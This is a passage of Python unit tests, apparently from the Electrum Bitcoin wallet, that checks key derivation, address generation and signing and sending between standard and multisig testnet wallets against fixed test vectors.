self.assertEqual(ks.xprv, 'xprv9s21ZrQH143K3nyWMZVjzGL4KKAE1zahmhTHuV5pdw4eK3o3igC5QywgQG7UTRe6TGBniPDpPFWzXMeMUFbBj8uYsfXGjyMmF54wdNt8QBm')
self.assertEqual(ks.xpub, 'xpub661MyMwAqRbcGH3yTb2kMQGnsLziRTJZ8vNthsVSCGbdBr8CGDWKxnGAFYgyKTzBtwvPPmfVAWJuFmxRXjSbUTg87wDkWQ5GmzpfUcN9t8Z')
self.assertEqual(w.get_receiving_addresses()[0], '3F4nm8Vunb7mxVvqhUP238PYge2hpU5qYv')
self.assertEqual(w.get_change_addresses()[0], '3N8jvKGmxzVHENn6B4zTdZt3N9bmRKjj96')
ks = create_keystore_from_bip32seed(xtype='p2wsh-p2sh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'YprvANkMzkodih9AKfL18akM2RmND5LwAyFo15dBc9FFPiGvzLBBjjjv8ATkEB2Y1mWv6NNaLSpVj8G3XosgVBA9frhpaUL6jHeFQXQTbqVPcv2')
self.assertEqual(ks.xpub, 'Ypub6bjiQGLXZ4hTY9QUEcHMPZi6m7BRaRyeNJYnQXerx3ous8WLHH4AfxnE5Tc2sos1Y47B1qGAWP3xGEBkYf1ZRBUPpk2aViMkwTABT6qoiBb')
self.assertEqual(w.get_receiving_addresses()[0], '3L1BxLLASGKE3DR1ruraWm3hZshGCKqcJx')
self.assertEqual(w.get_change_addresses()[0], '3NDGcbZVXTpaQWRhiuVPpXsNt4g2JiCX4E')
ks = create_keystore_from_bip32seed(xtype='p2wsh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'ZprvAhadJRUYsNgeAxX7xwXyEWrsP3VP7bFHvC9QPY98miep3RzQzPuUkE7tFNz81gAqW1VP5vR4BncbR6VFCsaAU6PRSp2XKCTjgFU6zRpk6Xp')
self.assertEqual(ks.xpub, 'Zpub6vZyhw1ShkEwPSbb4y4ybeobw5KsX3y9HR51BvYkL4BnvEKZXwDjJ2SN6fZcsiWvwhDymJriy3QW9WoKGMRaDR9zh5j15dBFDBDpqjK1ekQ')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1q84x0yrztvcjg88qef4d6978zccxulcmc9y88xcg4ghjdau999x7q7zv2qe')
self.assertEqual(w.get_change_addresses()[0], 'bc1q0fj5mra96hhnum80kllklc52zqn6kppt3hyzr49yhr3ecr42z3tsrkg3gs')
class TestWalletKeystoreAddressIntegrityForTestnet(TestCaseForTestnet):
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_multisig_seed_p2sh_segwit_testnet(self, mock_write):
# bip39 seed: finish seminar arrange erosion sunny coil insane together pretty lunch lunch rose
# der: m/49'/1'/0'
# NOTE: there is currently no bip43 standard derivation path for p2wsh-p2sh
ks1 = keystore.from_xprv('Uprv9BEixD3As2LK5h6G2SNT3cTqbZpsWYPceKTSuVAm1yuSybxSvQz2MV1o8cHTtctQmj4HAenb3eh5YJv4YRZjv35i8fofVnNbs4Dd2B4i5je')
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xpub, 'Upub5QE5Mia4hPtcJBAj8TuTQkQa9bfMv17U1YP3hsaNaKSRrQHbTxJGuHLGyv3MbKZixuPyjfXGUdbTjE4KwyFcX8YD7PX5ybTDbP11UT8UpZR')
# bip39 seed: square page wood spy oil story rebel give milk screen slide shuffle
# der: m/49'/1'/0'
ks2 = keystore.from_xpub('Upub5QRzUGRJuWJe5MxGzwgQAeyJjzcdGTXkkq77w6EfBkCyf5iWppSaZ4caY2MgWcU9LP4a4uE5apUFN4wLoENoe9tpu26mrUxeGsH84dN3JFh')
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2], '2of2')
self.assertEqual(w.txin_type, 'p2wsh-p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '2MzsfTfTGomPRne6TkctMmoDj6LwmVkDrMt')
self.assertEqual(w.get_change_addresses()[0], '2NFp9w8tbYYP9Ze2xQpeYBJQjx3gbXymHX7')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip32_extended_version_bytes(self, mock_write):
seed_words = 'crouch dumb relax small truck age shine pink invite spatial object tenant'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
bip32_seed = keystore.bip39_to_seed(seed_words, '')
self.assertEqual('0df68c16e522eea9c1d8e090cfb2139c3b3a2abed78cbcb3e20be2c29185d3b8df4e8ce4e52a1206a688aeb88bfee249585b41a7444673d1f16c0d45755fa8b9',
bh2u(bip32_seed))
def create_keystore_from_bip32seed(xtype):
ks = keystore.BIP32_KeyStore({})
ks.add_xprv_from_seed(bip32_seed, xtype=xtype, derivation='m/')
return ks
ks = create_keystore_from_bip32seed(xtype='standard')
self.assertEqual('033a05ec7ae9a9833b0696eb285a762f17379fa208b3dc28df1c501cf84fe415d0', ks.derive_pubkey(0, 0))
self.assertEqual('02bf27f41683d84183e4e930e66d64fc8af5508b4b5bf3c473c505e4dbddaeed80', ks.derive_pubkey(1, 0))
ks = create_keystore_from_bip32seed(xtype='standard') # p2pkh
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'tprv8ZgxMBicQKsPecD328MF9ux3dSaSFWci7FNQmuWH7uZ86eY8i3XpvjK8KSH8To2QphiZiUqaYc6nzDC6bTw8YCB9QJjaQL5pAApN4z7vh2B')
self.assertEqual(ks.xpub, 'tpubD6NzVbkrYhZ4Y5Epun1qZKcACU6NQqocgYyC4RYaYBMWw8nuLSMR7DvzVamkqxwRgrTJ1MBMhc8wwxT2vbHqMu8RBXy4BvjWMxR5EdZroxE')
self.assertEqual(w.get_receiving_addresses()[0], 'mpBTXYfWehjW2tavFwpUdqBJbZZkup13k2')
self.assertEqual(w.get_change_addresses()[0], 'mtkUQgf1psDtL67wMAKTv19LrdgPWy6GDQ')
ks = create_keystore_from_bip32seed(xtype='p2wpkh-p2sh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'uprv8tXDerPXZ1QsVuQ9rV8sN13YoQitC8cD2MtdZJQAVuw19kMMxhhPYnyGLeEiThgLELqNTxS91GTLsVofKAM9LRrkGeRzzEuJRtt1Tcostr7')
self.assertEqual(ks.xpub, 'upub57Wa4MvRPNyAiPUcxWfsj8zHMSZNbbL4PapEMgon4FTz2YgWWF1e6bHkBvpDKk2Rg2Zy9LsonXFFbv7jNeCZ5kdKWv8UkfcoxpdjJrZuBX6')
self.assertEqual(w.get_receiving_addresses()[0], '2MuzNWpcHrXyvPVKzEGT7Xrwp8uEnXXjWnK')
self.assertEqual(w.get_change_addresses()[0], '2MzTzY5VcGLwce7YmdEwjXhgQD7LYEKLJTm')
ks = create_keystore_from_bip32seed(xtype='p2wpkh')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(ks.xprv, 'vprv9DMUxX4ShgxMMCbGgqvVa693yNsL8kbhwUQrLhJ3svJtCrAbDMrxArdQMrCJTcLFdyxBDS2hTvotknRE2rmA8fYM8z8Ra9inhcwerEsG6Ev')
self.assertEqual(ks.xpub, 'vpub5SLqN2bLY4WeZgfjnsTVwE5nXQhpYDKZJhLT95hfSFqs5eVjkuBCiewtD8moKegM5fgmtpUNFBboVCjJ6LcZszJvPFpuLaSJEYhNhUAnrCS')
self.assertEqual(w.get_receiving_addresses()[0], 'tb1qtuynwzd0d6wptvyqmc6ehkm70zcamxpsaze002')
self.assertEqual(w.get_change_addresses()[0], 'tb1qjy5zunxh6hjysele86qqywfa437z4xwm4lm549')
ks = create_keystore_from_bip32seed(xtype='standard') # p2sh
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'tprv8ZgxMBicQKsPecD328MF9ux3dSaSFWci7FNQmuWH7uZ86eY8i3XpvjK8KSH8To2QphiZiUqaYc6nzDC6bTw8YCB9QJjaQL5pAApN4z7vh2B')
self.assertEqual(ks.xpub, 'tpubD6NzVbkrYhZ4Y5Epun1qZKcACU6NQqocgYyC4RYaYBMWw8nuLSMR7DvzVamkqxwRgrTJ1MBMhc8wwxT2vbHqMu8RBXy4BvjWMxR5EdZroxE')
self.assertEqual(w.get_receiving_addresses()[0], '2N6czpsRwQ3d8AHZPNbztf5NotzEsaZmVQ8')
self.assertEqual(w.get_change_addresses()[0], '2NDgwz4CoaSzdSAQdrCcLFWsJaVowCNgiPA')
ks = create_keystore_from_bip32seed(xtype='p2wsh-p2sh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'Uprv95RJn67y7xyEvUZXo9brC5PMXCm9QVHoLdYJUZfhsgmQmvvGj75fduqC9MCC28uETouMLYSFtUqqzfRRcPW6UuyR77YQPeNJKd9t3XutF8b')
self.assertEqual(ks.xpub, 'Upub5JQfBberxLXY8xdzuB8rZDL65Ebdox1ehrTuGx5KS2JPejFRGePvBi9fzdmgtBFKuVdx1vsvfjdkj5jVfsMWEEjzMPEtA55orYubtrCZmRr')
self.assertEqual(w.get_receiving_addresses()[0], '2NBZQ25GC3ipaF13ZY3UT8i2xnDuS17pJqx')
self.assertEqual(w.get_change_addresses()[0], '2NDmUgLVX8vKvcJ4FQ37GSUre6QtBzKkb6k')
ks = create_keystore_from_bip32seed(xtype='p2wsh')
w = WalletIntegrityHelper.create_multisig_wallet([ks], '1of1')
self.assertEqual(ks.xprv, 'Vprv16YtLrHXxePM6noKqtFtMtmUgBE9bEpF3fPLmpvuPksssLostujtdHBwqhEeVuzESz22UY8hyPx9ed684SQpCmUKSVhpxPFbvVNY7qnviNR')
self.assertEqual(ks.xpub, 'Vpub5dEvVGKn7251zFq7jXvUmJRbFCk5ka19cxz84LyCp2gGhq4eXJZUomop1qjGt5uFK8kkmQUV8PzJcNM4PZmX2URbDiwJjyuJ8GyFHRrEmmG')
self.assertEqual(w.get_receiving_addresses()[0], 'tb1q84x0yrztvcjg88qef4d6978zccxulcmc9y88xcg4ghjdau999x7qf2696k')
self.assertEqual(w.get_change_addresses()[0], 'tb1q0fj5mra96hhnum80kllklc52zqn6kppt3hyzr49yhr3ecr42z3ts5777jl')
class TestWalletSending(TestCaseForTestnet):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.electrum_path = tempfile.mkdtemp()
cls.config = SimpleConfig({'electrum_path': cls.electrum_path})
@classmethod
def tearDownClass(cls):
super().tearDownClass()
shutil.rmtree(cls.electrum_path)
def create_standard_wallet_from_seed(self, seed_words):
ks = keystore.from_seed(seed_words, '', False)
return WalletIntegrityHelper.create_standard_wallet(ks, gap_limit=2)
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2wpkh_and_compressed_p2pkh(self, mock_write):
wallet1 = self.create_standard_wallet_from_seed('bitter grass shiver impose acquire brush forget axis eager alone wine silver')
wallet2 = self.create_standard_wallet_from_seed('cycle rocket west magnet parrot shuffle foot correct salt library feed song')
# bootstrap wallet1
funding_tx = Transaction('01000000014576dacce264c24d81887642b726f5d64aa7825b21b350c7b75a57f337da6845010000006b483045022100a3f8b6155c71a98ad9986edd6161b20d24fad99b6463c23b463856c0ee54826d02200f606017fd987696ebbe5200daedde922eee264325a184d5bbda965ba5160821012102e5c473c051dae31043c335266d0ef89c1daab2f34d885cc7706b267f3269c609ffffffff0240420f00000000001600148a28bddb7f61864bdcf58b2ad13d5aeb3abc3c42a2ddb90e000000001976a914c384950342cb6f8df55175b48586838b03130fad88ac00000000')
funding_txid = funding_tx.txid()
funding_output_value = 1000000
self.assertEqual('add2535aedcbb5ba79cc2260868bb9e57f328738ca192937f2c92e0e94c19203', funding_txid)
wallet1.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2.get_receiving_address(), 250000)]
tx = wallet1.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1.is_mine(wallet1.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('010000000001010392c1940e2ec9f2372919ca3887327fe5b98b866022cc79bab5cbed5a53d2ad0000000000feffffff0290d00300000000001976a914ea7804a2c266063572cc009a63dc25dcc0e9d9b588ac285e0b0000000000160014690b59a8140602fb23cc2904ece9cc4daf361052024730440220608a5339ca894592da82119e1e4a1d09335d70a552c683687223b8ed724465e902201b3f0feccf391b1b6257e4b18970ae57d7ca060af2dae519b3690baad2b2a34e0121030faee9b4a25b7db82023ca989192712cdd4cb53d3d9338591c7909e581ae1c0c00000000',
str(tx_copy))
self.assertEqual('3c06ae4d9be8226a472b3e7f7c127c7e3016f525d658d26106b80b4c7e3228e2', tx_copy.txid())
self.assertEqual('d8d930ae91dce73118c3fffabbdfcfb87f5d91673fb4c7dfd0fbe7cf03bf426b', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED) # TX_HEIGHT_UNCONF_PARENT but nvm
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1.get_receiving_address(), 100000)]
tx = wallet2.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2.is_mine(wallet2.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('0100000001e228327e4c0bb80661d258d625f516307e7c127c7f3e2b476a22e89b4dae063c000000006b483045022100d3895b31e7c9766987c6f53794c7394f534f4acecefda5479d963236f9703d0b022026dd4e40700ceb788f136faf54bf85b966648dc7c2a608d8110604f2d22d59070121030b482838721a38d94847699fed8818b5c5f56500ef72f13489e365b65e5749cffeffffff02a0860100000000001600148a28bddb7f61864bdcf58b2ad13d5aeb3abc3c4268360200000000001976a914ca4c60999c46c2108326590b125aefd476dcb11888ac00000000',
str(tx_copy))
self.assertEqual('5f25707571eb776bdf14142f9966bf2a681906e0a79501edbb99a972c2ceb972', tx_copy.txid())
self.assertEqual('5f25707571eb776bdf14142f9966bf2a681906e0a79501edbb99a972c2ceb972', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 250000 - 5000 + 100000, 0), wallet1.get_balance())
self.assertEqual((0, 250000 - 5000 - 100000, 0), wallet2.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2sh_2of3_and_uncompressed_p2pkh(self, mock_write):
wallet1a = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('blast uniform dragon fiscal ensure vast young utility dinosaur abandon rookie sure', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4XJzYkhsCbDCcZRmDAKSD7bXi9mdCni7acVt45fxbTVZyU6jRGh29ULKTjoapkfFsSJvQHitcVKbQgzgkkYsAmaovcro7Mhf')
],
'2of3', gap_limit=2
)
wallet1b = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('cycle rocket west magnet parrot shuffle foot correct salt library feed song', '', True),
keystore.from_xpub('tpubD6NzVbkrYhZ4YTPEgwk4zzr8wyo7pXGmbbVUnfYNtx6SgAMF5q3LN3Kch58P9hxGNsTmP7Dn49nnrmpE6upoRb1Xojg12FGLuLHkVpVtS44'),
keystore.from_xpub('tpubD6NzVbkrYhZ4YARFMEZPckrqJkw59GZD1PXtQnw14ukvWDofR7Z1HMeSCxfYEZVvg4VdZ8zGok5VxHwdrLqew5cMdQntWc5mT7mh1CSgrnX')
],
'2of3', gap_limit=2
)
# ^ third seed: ghost into match ivory badge robot record tackle radar elbow traffic loud
wallet2 = self.create_standard_wallet_from_seed('powerful random nobody notice nothing important anyway look away hidden message over')
# bootstrap wallet1
funding_tx = Transaction('010000000001014121f99dc02f0364d2dab3d08905ff4c36fc76c55437fd90b769c35cc18618280100000000fdffffff02d4c22d00000000001600143fd1bc5d32245850c8cb5be5b09c73ccbb9a0f75001bb7000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e4887024830450221008781c78df0c9d4b5ea057333195d5d76bc29494d773f14fa80e27d2f288b2c360220762531614799b6f0fb8d539b18cb5232ab4253dd4385435157b28a44ff63810d0121033de77d21926e09efd04047ae2d39dbd3fb9db446e8b7ed53e0f70f9c9478f735dac11300')
funding_txid = funding_tx.txid()
funding_output_value = 12000000
self.assertEqual('b25cd55687c9e528c2cfd546054f35fb6741f7cf32d600f07dfecdf2e1d42071', funding_txid)
wallet1a.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2.get_receiving_address(), 370000)]
tx = wallet1a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx = Transaction(tx.serialize()) # simulates moving partial txn between cosigners
self.assertFalse(tx.is_complete())
wallet1b.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1a.is_mine(wallet1a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('01000000017120d4e1f2cdfe7df000d632cff74167fb354f0546d5cfc228e5c98756d55cb201000000fdfe0000483045022100f9ce5616683e613ae14b98d56436454b003348a8172e2ed598018e3d206e57d7022030c65c6551e839f9e9409812be624dbb4e36bd4152c9ed9b0988c10fd8201d1401483045022100d5cb94d4d1dcf01bb9e9280e8178a7e9ada3ad14378ca543afcc9f5667b27cb2022018e76b74800a21934e73b226b34cbbe45c877fba64693da8a20d3cb330f2eafd014c69522102afb4af9a91264e1c6dce3ebe5312801723270ac0ba8134b7b49129328fcb0f2821030b482838721a38d94847699fed8818b5c5f56500ef72f13489e365b65e5749cf2103e5db7969ae2f2576e6a061bf3bb2db16571e77ffb41e0b27170734359235cbce53aefeffffff0250a50500000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac2862b1000000000017a9142e517854aa54668128c0e9a3fdd4dec13ad571368700000000',
str(tx_copy))
self.assertEqual('26f3bdd0402e1cff19126244ebe3d32722cef0db507c7229ca8754f5e06ef25d', tx_copy.txid())
self.assertEqual('26f3bdd0402e1cff19126244ebe3d32722cef0db507c7229ca8754f5e06ef25d', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1a.get_receiving_address(), 100000)]
tx = wallet2.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
self.assertTrue(tx.is_complete())
self.assertFalse(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2.is_mine(wallet2.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('01000000015df26ee0f55487ca29727c50dbf0ce2227d3e3eb44621219ff1c2e40d0bdf326000000008b483045022100bd9f61ba82507d3a28922fb8be129e14699dfa54ddd03cc9494f696d38ac4121022071afca6fad5bc5c09b0a675e6444be3e97dbbdbc283764ee5f4e27a032d933d80141045f7ba332df2a7b4f5d13f246e307c9174cfa9b8b05f3b83410a3c23ef8958d610be285963d67c7bc1feb082f168fa9877c25999963ff8b56b242a852b23e25edfeffffff02a08601000000000017a91480c2353f6a7bc3c71e99e062655b19adb3dd2e4887280b0400000000001976a914ca14915184a2662b5d1505ce7142c8ca066c70e288ac00000000',
str(tx_copy))
self.assertEqual('c573b3f8464a4ed40dfc79d0889a780f44e917beef7a75883b2427c2987f3e95', tx_copy.txid())
self.assertEqual('c573b3f8464a4ed40dfc79d0889a780f44e917beef7a75883b2427c2987f3e95', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
self.assertEqual((0, funding_output_value - 370000 - 5000 + 100000, 0), wallet1a.get_balance())
self.assertEqual((0, 370000 - 5000 - 100000, 0), wallet2.get_balance())
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_between_p2wsh_2of3_and_p2wsh_p2sh_2of2(self, mock_write):
wallet1a = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('bitter grass shiver impose acquire brush forget axis eager alone wine silver', '', True),
keystore.from_xpub('Vpub5fcdcgEwTJmbmqAktuK8Kyq92fMf7sWkcP6oqAii2tG47dNbfkGEGUbfS9NuZaRywLkHE6EmUksrqo32ZL3ouLN1HTar6oRiHpDzKMAF1tf'),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra')
],
'2of3', gap_limit=2
)
wallet1b = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('snow nest raise royal more walk demise rotate smooth spirit canyon gun', '', True),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra'),
keystore.from_xpub('Vpub5gSKXzxK7FeKQedu2q1z9oJWxqvX72AArW3HSWpEhc8othDH8xMDu28gr7gf17sp492BuJod8Tn7anjvJrKpETwqnQqX7CS8fcYyUtedEMk')
],
'2of3', gap_limit=2
)
# ^ third seed: hedgehog sunset update estate number jungle amount piano friend donate upper wool
wallet2a = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: finish seminar arrange erosion sunny coil insane together pretty lunch lunch rose, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9CvELvByqm8k2dpecJVjgLMX1z5DufEjY4fBC5YvdGF5WjGCa7GVJJ2fYni1tyuF7Hw83E6W2ZBjAhaFLZv2ri3rEsubkCd5avg4EHKoDBN'),
keystore.from_xpub('Upub5Qb8ik4Cnu8g97KLXKgVXHqY6tH8emQvqtBncjSKsyfTZuorPtTZgX7ovKKZHuuVGBVd1MTTBkWez1XXt2weN1sWBz6SfgRPQYEkNgz81QF')
],
'2of2', gap_limit=2
)
wallet2b = WalletIntegrityHelper.create_multisig_wallet(
[
# bip39: square page wood spy oil story rebel give milk screen slide shuffle, der: m/1234'/1'/0', p2wsh-p2sh multisig
keystore.from_xprv('Uprv9BbnKEXJxXaNvdEsRJ9VA9toYrSeFJh5UfGBpM2iKe8Uh7UhrM9K8ioL53s8gvCoGfirHHaqpABDAE7VUNw8LNU1DMJKVoWyeNKu9XcDC19'),
keystore.from_xpub('Upub5RuakRisg8h3F7u7iL2k3UJFa1uiK7xauHamzTxYBbn4PXbM7eajr6M9Q2VCr6cVGhfhqWQqxnABvtSATuVM1xzxk4nA189jJwzaMn1QX7V')
],
'2of2', gap_limit=2
)
# bootstrap wallet1
funding_tx = Transaction('01000000000101a41aae475d026c9255200082c7fad26dc47771275b0afba238dccda98a597bd20000000000fdffffff02400d0300000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c9dcd410000000000160014824626055515f3ed1d2cfc9152d2e70685c71e8f02483045022100b9f39fad57d07ce1e18251424034f21f10f20e59931041b5167ae343ce973cf602200fefb727fa0ffd25b353f1bcdae2395898fe407b692c62f5885afbf52fa06f5701210301a28f68511ace43114b674371257bb599fd2c686c4b19544870b1799c954b40e9c11300')
funding_txid = funding_tx.txid()
funding_output_value = 200000
self.assertEqual('d2bd6c9d332db8e2c50aa521cd50f963fba214645aab2f7556e061a412103e21', funding_txid)
wallet1a.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# wallet1 -> wallet2
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet2a.get_receiving_address(), 165000)]
tx = wallet1a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
txid = tx.txid()
tx = Transaction(tx.serialize()) # simulates moving partial txn between cosigners
self.assertEqual(txid, tx.txid())
self.assertFalse(tx.is_complete())
wallet1b.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet1a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet1a.is_mine(wallet1a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('01000000000101213e1012a461e056752fab5a6414a2fb63f950cd21a50ac5e2b82d339d6cbdd20000000000feffffff023075000000000000220020cc5e4cc05a76d0648cd0742768556317e9f8cc729aed077134287909035dba88888402000000000017a914187842cea9c15989a51ce7ca889a08b824bf8743870400483045022100ea2fbd3d8681cfafdcae1bdaaa64f92fb9872fb8f6bf03a2b7effcf7390b66c8022021a79eff7975479934f958f3766d6ac61d708c79b785e398b3bcd84b1039e9b501483045022100dbc4f1ec18f0e0deb4ff88d7d5b3d3b7b500a80d0c0f33efbd3262f0c8689095022074fd226c0b52e3716ad907d14cba9c79aca482a8f4a51662ca83a5b9db49e15b016952210223f815ab09f6bfc8519165c5232947ae89d9d43d678fb3486f3b28382a2371fa210273c529c2c9a99592f2066cebc2172a48991af2b471cb726b9df78c6497ce984e2102aa8fc578b445a1e4257be6b978fcece92980def98dce0e1eb89e7364635ae94153ae00000000',
str(tx_copy))
self.assertEqual('6e9c3cd8788bdb970a124ea06136d52bc01cec4f9b1e217627d5e90ebe77d049', tx_copy.txid())
self.assertEqual('c58650fb77d04577fccb3e201deecbf691ab52ffb61cd2e57996c4d51f7e980b', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual(txid, tx_copy.txid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet2 -> wallet1
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, wallet1a.get_receiving_address(), 100000)]
tx = wallet2a.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
txid = tx.txid()
tx = Transaction(tx.serialize()) # simulates moving partial txn between cosigners
self.assertEqual(txid, tx.txid())
self.assertFalse(tx.is_complete())
wallet2b.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
self.assertTrue(tx.is_segwit())
self.assertEqual(1, len(tx.inputs()))
self.assertEqual(wallet2a.txin_type, tx.inputs()[0]['type'])
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet2a.is_mine(wallet2a.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual('0100000000010149d077be0ee9d52776211e9b4fec1cc02bd53661a04e120a97db8b78d83c9c6e01000000232200204311edae835c7a5aa712c8ca644180f13a3b2f3b420fa879b181474724d6163cfeffffff0260ea00000000000017a9143025051b6b5ccd4baf30dfe2de8aa84f0dd567ed87a0860100000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c0400483045022100c254468bbe6b8bd1c8c01b6a223e46cc5c6b56fbba87d59575385ad249133b0e02207139688f8d6ae8076c92a266d98454d25c040d04c8e513a37bf7c32dad3e48210147304402204af5edbab2d674f6a9edef8c97b2f7fdf8ababedc7b287710cc7a64d4699358b022064e2d07f4bb32373be31b2003dc56b7b831a7c01419326efb3011c64b898b3f00147522102119f899075a131d4d519d4cdcf5de5907dc2df3b93d54b53ded852211d2b6cb12102fdb0f6775d4b6619257c43343ba5e7807b0164f1eb3f00f2b594ab9e53ab812652ae00000000',
str(tx_copy))
self.assertEqual('84b0dcb43022385f7a10e2710e5625a2be3cd6e390387b6100b55500d5eea8f6', tx_copy.txid())
self.assertEqual('7e561e25da843326e61fd20a40b72fcaeb8690176fc7c3fcbadb3a0146c8396c', tx_copy.wtxid())
self.assertEqual(tx.wtxid(), tx_copy.wtxid())
self.assertEqual(txid, tx_copy.txid())
wallet1a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
wallet2a.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
# wallet level checks
